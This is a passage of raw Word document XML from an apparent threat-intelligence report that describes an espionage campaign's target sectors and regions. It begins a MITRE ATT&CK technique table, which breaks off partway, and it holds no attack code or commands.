          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internet and Network Infrastructure Operators</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD5442C" w14:textId="734F6049" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Internet service providers and network infrastructure operators were targeted because they manage critical routing and traffic-handling systems. Access to these organizations enabled attackers to monitor network traffic, manipulate routing operations, and use trusted infrastructure as operational relay points for future attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C6E48F" w14:textId="68849FDA" w:rsidR="00AD249E" w:rsidRPr="003168F2" w:rsidRDefault="00000000" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:pict w14:anchorId="097BAC10">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA542E5" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Geographic Focus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42042F39" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>United States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359463FE" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Organizations in the United States were a major focus due to the country’s extensive telecommunications infrastructure, defense sector presence, and concentration of high-value enterprise networks. Targeting U.S.-based infrastructure also provided opportunities for intelligence collection and strategic surveillance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CCC94A" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Asia-Pacific (APJ) Region</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352D056" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The Asia-Pacific region was targeted because of its rapidly growing technology sector, strategic geopolitical importance, and extensive telecommunications infrastructure. Organizations across the region often serve as key hubs for international communications and enterprise connectivity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0F2C6A" w14:textId="77777777" w:rsidR="00CC017C" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="001A1788">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>High-Value Enterprise Networking Environments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130B3889" w14:textId="3107E1B0" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00CC017C" w:rsidP="007423AA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The attackers specifically focused on enterprises operating large-scale or mission-critical networking environments. These organizations often maintain complex routing infrastructure, sensitive communications, and privileged administrative systems that are valuable for espionage, traffic monitoring, and long-term covert access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308497AB" w14:textId="24B3A5A2" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00AD249E">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="003168F2" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6831B945" wp14:editId="6187170F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>512068</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>4788260</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5712760" cy="4810125"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="768782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8294" name="Picture 76878294"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5712760" cy="4810125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B42FCF" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43B877AB" wp14:editId="65906E14">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1809750</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-38735</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3048000" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1451135392" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3048000" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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987D7B1" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:142.5pt;margin-top:-3.05pt;width:240pt;height:33.7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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Attack Flow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603DF874" w14:textId="1AE60867" w:rsidR="001B2CDA" w:rsidRPr="003168F2" w:rsidRDefault="003168F2" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0C93D218" wp14:editId="59927F60">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>509270</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>96040</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5680710" cy="4381500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1716982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8208" name="Picture 171698208"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5680710" cy="4381500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="123C7B55" w14:textId="01FAA4CA" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B3BF63" w14:textId="70DBD459" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00B42FCF" w:rsidP="001B2CDA">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251668480" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3C6E476E" wp14:editId="4B95DF5C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1213485</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-43815</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4362450" cy="428625"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="1499396573" name="Rectangle: Rounded Corners 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4362450" cy="428625"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:noFill/>
                        <a:ln w="285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29E077A" id="Rectangle: Rounded Corners 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:95.55pt;margin-top:-3.45pt;width:343.5pt;height:33.7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" filled="f" strokecolor="#030e13 [484]" strokeweight="2.25pt">
                <v:stroke joinstyle="miter"/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00700371" w:rsidRPr="003168F2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK Techniques Used</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>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2128"/>
        <w:gridCol w:w="4119"/>
        <w:gridCol w:w="1991"/>
      </w:tblGrid>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="51760D83" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38C1DF07" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0095F3E0" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13B9942C" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="28"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="32786A9F" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38F14267" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Initial Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A8D497B" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Valid Accounts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3948A1EA" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1078</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="7B488683" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="509F1CB8" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="031D9936" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Unix Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218B6258" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>T1059.004</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00700371" w:rsidRPr="003168F2" w14:paraId="7B526472" w14:textId="77777777" w:rsidTr="00AD249E">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="285D3771" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B24BA9A" w14:textId="77777777" w:rsidR="00700371" w:rsidRPr="003168F2" w:rsidRDefault="00700371" w:rsidP="00700371">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003168F2">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Network Device CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
